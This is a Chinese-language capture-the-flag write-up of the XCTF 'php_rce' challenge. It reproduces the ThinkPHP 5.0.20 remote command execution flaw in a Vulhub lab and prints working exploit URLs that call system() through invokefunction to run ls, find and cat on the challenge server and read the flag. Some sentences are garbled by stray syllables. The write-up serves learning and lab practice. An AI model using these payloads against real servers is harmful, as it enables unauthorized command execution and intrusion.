XCTF篇：Web (高手进阶区) 3 ThinkPHP5.0.20远程命令执行漏洞复现

3.php_rce

感觉是让我找ThinkPHP V5的漏洞？？
但我连ThinkPHP V5是什么都不知道==
对我这小白一点也不友好
搜索发现框架和cms的区别

框架就是提供一个快速bai敏捷开发的平台,里面一些常du用的功zhi能,都封装好,然后你要按照框架的语法和文件结dao构来进行网站的建设,就好比是搭建了一个房子外面的框架都设计好,你需要做的是修改里面的东西.
而cms是将整个房间,不仅框架搭建好了.里面的各个房间也给你布置好,可以不经过任何加工直接可以入住.
两者的优缺点是:
框架相对比较灵活些,可以做更多自己想做的,而不用看太多的代码.
CMS的优点就是功能比较齐全,代码都给你做好,你要做的仅仅是安排一下布局,或者做个模板.但是可变化性没有框架好.要修改的话研究的代码比较多.核心的部分比较难研究.

然后试着去漏洞库搜索ThinkPHP的漏洞

发现也不公开，去看看漏洞复现平台有没有
发现Vulhub上有，去搭一个回来…

Vulhub搭建教学https://www.freebuf.com/sectool/226207.html
https://www.cnblogs.com/lxfweb/p/12952490.html

发现一模一样
学习这个漏洞
是可以远程命令执行

执行这个会返回phpinfo

http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

执行这个可以命令执行

http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

可以命令执行，我们可以返回题目了
用find / -name "*flag*"来找

http://220.249.52.133:31407/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22*flag*%22

在最后一行出现了用cat查看

http://220.249.52.133:31407/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/usr/include/linux/kernel-page-flags.h%20/usr/bin/dpkg-buildflags%20/flag%20/flag

出现了

成功